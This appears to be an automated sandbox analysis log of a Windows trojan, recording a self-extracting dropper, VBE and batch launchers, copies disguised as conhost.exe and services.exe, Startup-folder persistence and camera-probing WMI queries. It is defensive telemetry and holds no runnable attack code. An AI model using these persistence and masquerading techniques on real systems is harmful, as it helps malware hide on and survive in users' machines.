                                    Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Windows\Media\Characters\088424020bedd6
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AfbbeRiC.log 80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: String function: 00CDEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: String function: 00CDEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: String function: 00CDF5F0 appears 31 times
                                    Source: kIdT4m0aa4.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs kIdT4m0aa4.exe
                                    Source: kIdT4m0aa4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: classification engineClassification label: mal100.troj.adwa.evad.winEXE@20/72@1/1
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CC6C74 GetLastError,FormatMessageW,0_2_00CC6C74
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CDA6C2
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\IQRzjLYS.log
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ffe580e3842ee6cf92d74a6cb048881c30039e64977359bda0dcef15e9441fa1
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
                                    Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_03
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\AppData\Local\Temp\g3XcAN3Zvu
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" "
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCommand line argument: sfxname0_2_00CDDF1E
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCommand line argument: sfxstime0_2_00CDDF1E
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCommand line argument: STARTDLG0_2_00CDDF1E
                                    Source: kIdT4m0aa4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: kIdT4m0aa4.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exe File read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exe File read: C:\Users\user\Desktop\kIdT4m0aa4.exe
                                    Source: unknownProcess created: C:\Users\user\Desktop\kIdT4m0aa4.exe "C:\Users\user\Desktop\kIdT4m0aa4.exe"
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProviderWebSavesNet\hostcrt.exe "C:\ProviderWebSavesNet/hostcrt.exe"
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe "C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe"
                                    Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe"
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\kIdT4m0aa4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\ProviderWebSavesNet\hostcrt.exe Directory created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Source: C:\ProviderWebSavesNet\hostcrt.exe Directory created: C:\Program Files\Microsoft\d1eeccb3e1a73c
Source: kIdT4m0aa4.exe Static file information: File size 4201265 > 1048576
Source: kIdT4m0aa4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kIdT4m0aa4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kIdT4m0aa4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kIdT4m0aa4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kIdT4m0aa4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kIdT4m0aa4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: kIdT4m0aa4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kIdT4m0aa4.exe
Source: kIdT4m0aa4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kIdT4m0aa4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kIdT4m0aa4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kIdT4m0aa4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kIdT4m0aa4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\kIdT4m0aa4.exe File created: C:\ProviderWebSavesNet\__tmp_rar_sfx_access_check_4221828
Source: kIdT4m0aa4.exe Static PE information: section name: .didat

                                    Persistence and Installation Behavior

Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\bzLxRmdk.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\FxsAqTHc.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\NhTpGmEa.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\LYOHFeSO.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\vGpScIbo.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\AfbbeRiC.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\hkEDPjHT.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\vOZlGrCu.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\GcNqxydU.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\gIdVKdin.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\jBsEwaTl.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\bmSpwCMB.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\YppwRUxj.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\BpvsVBNg.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\JrdzzpEh.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\ILIJsLjp.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\tTFBRhfQ.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\aONOculH.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\ipPePSwT.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\lfFVXOxM.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\rYiuzuCB.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\WEJfKGnq.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\krBMlBBO.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\ihfMljWN.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\pVwLeLxF.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\TLuxYJBs.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\zLibuNkF.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\IQRzjLYS.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\TrDhynDR.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\mJqNRsNh.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Recovery\COBPewMCbcSeQUSyEIOt.exe
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Windows\Media\Characters\conhost.exe
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\IuBreppm.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\RIIODaxx.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\brbenDCe.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\BySrFogd.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\UfHpjBzP.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\eGrnpudr.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\YGwOgprl.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\GuUJMTWW.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\BOUJPwoA.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\gzGVarPq.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\tyuuQYhQ.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\OwCQqHNY.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\cRzxxdpC.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\dtNNImGZ.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\CLwRlwDv.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\sGbclZIy.log
Source: C:\Users\user\Desktop\kIdT4m0aa4.exe File created: C:\ProviderWebSavesNet\hostcrt.exe
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\mrjuDXUe.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\TighOBkV.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\ehSVuzCX.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Users\user\Desktop\KcbhohwK.log
Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\ProviderWebSavesNet\COBPewMCbcSeQUSyEIOt.exe
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\mBGunJnb.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\eObFTdEx.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\kyUMRaig.log
Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe File created: C:\Users\user\Desktop\QyoyMrRT.log
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Windows\Media\Characters\conhost.exeJump to dropped file

                                    Boot Survival

                                    Source: C:\ProviderWebSavesNet\hostcrt.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe, File created: C:\Users\user\Start Menu\Programs\Startup\services.exe
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe, File created: C:\Users\user\Start Menu\Programs\Startup\c5b4cb5e9653cc
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\OpenWith.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
